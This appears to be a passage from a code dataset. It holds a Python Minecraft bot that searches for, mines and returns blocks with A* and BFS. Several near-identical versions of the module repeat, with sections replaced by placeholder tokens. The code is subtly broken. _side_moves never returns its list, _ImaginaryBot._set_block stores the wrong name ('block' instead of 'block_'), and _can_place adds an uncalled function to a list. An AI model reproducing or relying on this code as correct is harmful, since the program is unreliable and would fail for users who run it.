None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n <docstring token>\n <function token>\n <function token>\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n 